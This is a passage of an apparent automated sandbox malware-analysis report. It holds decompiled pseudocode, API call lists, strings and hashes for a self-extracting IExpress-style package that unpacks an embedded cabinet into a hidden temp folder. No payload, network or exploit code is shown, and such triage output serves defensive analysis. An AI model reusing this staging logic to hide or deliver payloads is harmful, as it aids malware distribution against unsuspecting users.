                                                                        																			_t49 = E00F8597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E00F82630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E00F8658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0xf891e4;
                                                                        																					E00F81781(0xf891e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E00F85467(0xf891e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E00F82630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E00F8597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E00F85467(0xf891e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0xf891e4;
                                                                        											_t70 = E00F82630(0, 0xf891e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0xf891e4;
                                                                        												_t71 = E00F85467(0xf891e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E00F8597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0xf88b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E00F85467(0xf88b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E00F844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0xf89124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E00F86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}
                                                                        0x00f857e3
                                                                        0x00f857ef
                                                                        0x00f857f5
                                                                        0x00f857f8
                                                                        0x00f8580a
                                                                        0x00f8580a
                                                                        0x00f857fa
                                                                        0x00f85802
                                                                        0x00f85802
                                                                        0x00f8580d
                                                                        0x00f8580f
                                                                        0x00f85830
                                                                        0x00f85836
                                                                        0x00f8583d
                                                                        0x00f8584b
                                                                        0x00f85851
                                                                        0x00f85855
                                                                        0x00f8585a
                                                                        0x00f8585c
                                                                        0x00000000
                                                                        0x00f8585e
                                                                        0x00f8585e
                                                                        0x00000000
                                                                        0x00f8585e
                                                                        0x00f85811
                                                                        0x00f85817
                                                                        0x00f85819
                                                                        0x00f8581f
                                                                        0x00000000
                                                                        0x00f8581f
                                                                        0x00f85791
                                                                        0x00f85797
                                                                        0x00f8579c
                                                                        0x00f8579e
                                                                        0x00000000
                                                                        0x00f857a0
                                                                        0x00f857a9
                                                                        0x00f857ae
                                                                        0x00f857b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f857b0
                                                                        0x00f8579e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85769
                                                                        0x00f85762
                                                                        0x00f85753
                                                                        0x00f8574f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8572e
                                                                        0x00000000
                                                                        0x00f85864
                                                                        0x00f85864
                                                                        0x00f85864
                                                                        0x00f85717
                                                                        0x00000000
                                                                        0x00f856c3
                                                                        0x00f856c5
                                                                        0x00f856c9
                                                                        0x00f856ce
                                                                        0x00f856d0
                                                                        0x00000000
                                                                        0x00f856d6
                                                                        0x00f856d6
                                                                        0x00f856d8
                                                                        0x00f856dd
                                                                        0x00f856df
                                                                        0x00000000
                                                                        0x00f856e1
                                                                        0x00f856e2
                                                                        0x00f856e4
                                                                        0x00f856e6
                                                                        0x00f856eb
                                                                        0x00f856ed
                                                                        0x00000000
                                                                        0x00f856f3
                                                                        0x00f856f3
                                                                        0x00000000
                                                                        0x00f8586c
                                                                        0x00f85878
                                                                        0x00f8587e
                                                                        0x00f85882
                                                                        0x00f85883
                                                                        0x00f85889
                                                                        0x00f8588e
                                                                        0x00f8588e
                                                                        0x00000000
                                                                        0x00f85896
                                                                        0x00f856ed
                                                                        0x00f856df
                                                                        0x00f856d0
                                                                        0x00f856c1
                                                                        0x00f856a8
                                                                        0x00f8565b
                                                                        0x00f8565b
                                                                        0x00f8565d
                                                                        0x00f85669
                                                                        0x00f85669
                                                                        0x00f8565f
                                                                        0x00f8565f
                                                                        0x00f85665
                                                                        0x00f85667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85667
                                                                        0x00f8566c
                                                                        0x00f85673
                                                                        0x00f85678
                                                                        0x00f8567a
                                                                        0x00f8589b
                                                                        0x00f8589b
                                                                        0x00f85680
                                                                        0x00f85685
                                                                        0x00f8568c
                                                                        0x00000000
                                                                        0x00f8568c
                                                                        0x00f8567a
                                                                        0x00f8560e
                                                                        0x00f85613
                                                                        0x00f8561a
                                                                        0x00f85620
                                                                        0x00f85626
                                                                        0x00000000
                                                                        0x00f85626
                                                                        0x00f855db
                                                                        0x00f855e0
                                                                        0x00f855e7
                                                                        0x00f855f1
                                                                        0x00f855f6
                                                                        0x00f855f6
                                                                        0x00f855f6
                                                                        0x00f858b7
                                                                        0x00f858c7

                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00F855CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F85638
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F8564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85620
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F856B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F8571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F85737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F857CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F857EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F85802
                                                                          • Part of subcall function 00F82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00F82654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F85830
                                                                          • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                          • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                          • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                          • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F85878
                                                                          • Part of subcall function 00F8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                          • Part of subcall function 00F8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-3110009808
                                                                        • Opcode ID: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                        • Instruction ID: e9d0b85950076327f5867745168dc9044b6e566591497be0af7a2b04e7a98adc
                                                                        • Opcode Fuzzy Hash: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                        • Instruction Fuzzy Hash: 95814C71E04A099BEB20BB708C85BFE72AD9F50B50F4401A6F586D6191EF78CDC6BB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 f8597d-f859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 f859bb-f859d8 call f844b9 call f86285 324->325 326 f859dd-f85a1b GetDiskFreeSpaceA 324->326 343 f85c05-f85c14 call f86ce0 325->343 328 f85ba1-f85bde memset call f86285 GetLastError FormatMessageA 326->328 329 f85a21-f85a4a MulDiv 326->329 339 f85be3-f85bfc call f844b9 SetCurrentDirectoryA 328->339 329->328 332 f85a50-f85a6c GetVolumeInformationA 329->332 335 f85a6e-f85ab0 memset call f86285 GetLastError FormatMessageA 332->335 336 f85ab5-f85aca SetCurrentDirectoryA 332->336 335->339 337 f85acc-f85ad1 336->337 341 f85ae2-f85ae4 337->341 342 f85ad3-f85ad8 337->342 351 f85c02 339->351 348 f85ae6 341->348 349 f85ae7-f85af8 341->349 342->341 346 f85ada-f85ae0 342->346 346->337 346->341 348->349 353 f85af9-f85afb 349->353 354 f85c04 351->354 355 f85afd-f85b03 353->355 356 f85b05-f85b08 353->356 354->343 355->353 355->356 357 f85b0a-f85b1b call f844b9 356->357 358 f85b20-f85b27 356->358 357->351 360 f85b29-f85b33 358->360 361 f85b52-f85b5b 358->361 360->361 364 f85b35-f85b50 360->364 362 f85b62-f85b6d 361->362 365 f85b6f-f85b74 362->365 366 f85b76-f85b7d 362->366 364->362 367 f85b85 365->367 368 f85b7f-f85b81 366->368 369 f85b83 366->369 370 f85b96-f85b9f 367->370 371 f85b87-f85b94 call f8268b 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E00F8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0xf89124 = E00F86285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E00F844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0xf89a34 & 0x00000008;
                                                                        							if(( *0xf89a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0xf89a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0xf89124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E00F8268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0xf89a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0xf89a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E00F844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E00F844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E00F86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F85A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00F85A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F85A64
                                                                        • memset.MSVCRT ref: 00F85A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F85A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F85AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F85BFC
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                        • Instruction ID: ce33b91b0c74f9c25942b46efbaf9f788e2146554266ef4d571621944daf9692
                                                                        • Opcode Fuzzy Hash: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                        • Instruction Fuzzy Hash: 8D71A2B1A0061CAFEB15EB64CCC5BFA77ACEB48750F5440AAF505D6140DA749E85AF20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 f84fe0-f8501a call f8468f FindResourceA LoadResource LockResource 377 f85020-f85027 374->377 378 f85161-f85163 374->378 379 f85029-f85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 f85057-f8505e call f84efd 377->380 379->380 383 f8507c-f850b4 380->383 384 f85060-f85077 call f844b9 380->384 388 f850e8-f85104 call f844b9 383->388 389 f850b6-f850da 383->389 390 f85107-f8510e 384->390 402 f85106 388->402 401 f850dc 389->401 389->402 392 f8511d-f8511f 390->392 393 f85110-f85117 FreeResource 390->393 396 f8513a-f85141 392->396 397 f85121-f85127 392->397 393->392 399 f8515f 396->399 400 f85143-f8514a 396->400 397->396 398 f85129-f85135 call f844b9 397->398 398->396 399->378 400->399 404 f8514c-f85159 SendMessageA 400->404 405 f850e3-f850e6 401->405 402->390 404->399 405->388 405->402
                                                                        C-Code - Quality: 77%
                                                                        			E00F84FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0xf89144 = E00F8468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0xf89140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0xf88584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0xf88584, 0x841), 5);
                                                                        				}
                                                                        				_t10 = E00F84EFD(0, 0);
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E00F84CA0, E00F84CC0, E00F84980, E00F84A50, E00F84AD0, E00F84B60, E00F84BC0, 1, 0xf89148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0xf89148; // 0x0
                                                                        						_t24 =  *0xf88584; // 0x0
                                                                        						E00F844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0xf81140, 0, E00F84CD0, 0, 0xf89140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0xf88584; // 0x0
                                                                        					E00F844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0xf89140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0xf89140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0xf891d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E00F844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0xf88a38 & 0x00000001) == 0 && ( *0xf89a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0xf88584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F84FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00F85006
                                                                        • LockResource.KERNEL32(00000000), ref: 00F8500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00F85030
                                                                        • ShowWindow.USER32(00000000), ref: 00F85037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00F8504A
                                                                        • ShowWindow.USER32(00000000), ref: 00F85051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F85111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F85159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
